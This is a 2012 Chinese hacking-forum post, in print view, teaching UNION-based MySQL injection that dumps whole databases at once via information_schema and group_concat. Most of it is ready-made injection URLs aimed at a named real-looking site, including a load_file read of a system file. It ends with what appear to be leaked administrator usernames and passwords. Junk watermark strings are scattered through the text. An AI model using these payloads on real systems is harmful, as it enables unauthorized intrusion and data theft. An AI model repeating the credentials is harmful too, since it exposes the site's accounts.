中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]
作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似: q5 }, e; y/ `/ M
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
8 m5 \$ J1 c- r* o6 x  y1 Q& b+ Q, b- _; J, O# R

6 H, u7 r0 T. g+ p3 [% Y6 j优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
- E" [4 m$ Y  }; v" J6 F  p- i1 d* n+ s
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢..." ]0 u( Q3 Q: i

! n# ]) }& l5 `5 e下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示1 m1 ]" |4 @  G4 F! ~3 m  W) V
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
6 E: x( P, a; p$ @
0 G( o& p8 }+ L0 Uhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17: K' A& t8 K( O# w
( R, C% a- O2 `' p! e
读出所有库:
8 P. d$ F4 V8 fhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
, O1 V7 C4 Z: V7 q" r1 v; X, P- K1 B; C% L8 g" H4 r  j& r
4 d, `8 ]1 k1 P4 G0 Y

$ \' z0 v# C. Y2 ~读出所有表:
% _- U: Z6 S4 v1 }( ~* w3 D; j8 Uhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
2 p2 P  J# O- s8 o& ^, x8 Q: M. }; Q. F5 D3 O. j( A
读出所有表字段:4 w! b' {, @9 i* g9 D
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
2 D+ q% O& P$ l$ d( ^0 ?*/ (97,100,109,105,110)为admin的ascii码 依次类推* W' O) [9 o! R, \. m, r
. J+ h: S4 ?  d! x0 W" \
读出所有表字段里的内容:3 v4 }) q! w9 k
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin% w, W/ p* _2 p( P% t0 ?
$ W, e/ W4 \% [4 n: P) e" o8 [# Z
2 G7 Z, [2 l, Y0 v( _( G9 v6 @( J. K! H
3 h  @" R% f) g
6 K3 ~4 {; {4 ^5 ~/ ?; d

+ k; r- C9 u( |
9 ]' R. l" \# |4 Bhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
9 g) B% Z+ T1 _1 K7 \" z
2 p7 ~' _- M2 R$ c% E. s9 j
$ W% u- B' ]8 R% L7 whttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
. ^+ \$ A2 [2 ]. l& r
. l4 E  T: b; `0 Y; B9 |4 z2 Xhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%231 B# N" u+ _, d  D1 ^9 L
* \3 V0 N: J4 m- X2 b5 _# s

1 Q% J' f9 y$ S8 ?) d1 fhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
) B* j7 b% M, |( e% k6 g/ B$ e0 O3 A$ |# H% D

% @: d" B' w% s9 [6 l: U        webmaster:dzb521123,simlab:simadmin20043233
& U/ U  ]) B! g( N8 H# r



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2